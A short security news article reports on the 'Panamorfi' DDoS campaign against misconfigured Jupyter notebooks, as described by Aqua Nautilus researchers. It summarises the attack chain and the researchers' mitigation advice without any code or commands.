The Panamorfi DDoS Campaign: Exploiting Misconfigured Jupyter Notebooks

A new Distributed Denial of Service (DDoS) campaign, dubbed “Panamorfi,” has been unleashed by threat actor yawixooo, targeting misconfigured Jupyter notebooks exposed online. This campaign poses a significant threat to data practitioners such as data engineers, data analysts, and data scientists who heavily rely on Jupyter notebooks for their work.

The attack operation, as reported by researchers from Aqua Nautilus, involves the threat actor gaining initial access to internet-facing notebooks and downloading a zip file from a file-sharing platform. The zip file, containing two Jar files – conn.jar and mineping.jar, is approximately 17 MB in size and is used to launch a TCP flood DDoS attack on target servers.

The conn.jar file, which contains the initial execution code, leverages Discord to control the DDoS attack, while the mineping.jar file serves as a Minecraft server DDoS tool. The attackers have configured the tool to write the results of the attack to a Discord channel, aiming to overwhelm the target server and consume its resources.

To mitigate against such attacks, researchers recommend restricting access to Jupyter notebooks through secure practices, blocking the runtime of files associated with the campaign, limiting code execution, and regularly updating with the latest security patches. It is also advised to refrain from sharing sensitive information or credentials on Jupyter notebooks to prevent falling victim to such threat actor campaigns.

The researchers were able to successfully halt the Panamorfi attack by implementing a runtime policy that blocks the execution of the conn.jar file, effectively putting an end to the entire attack. Data practitioners are urged to take special precautions and safeguard their Jupyter notebooks from potential threats like Panamorfi.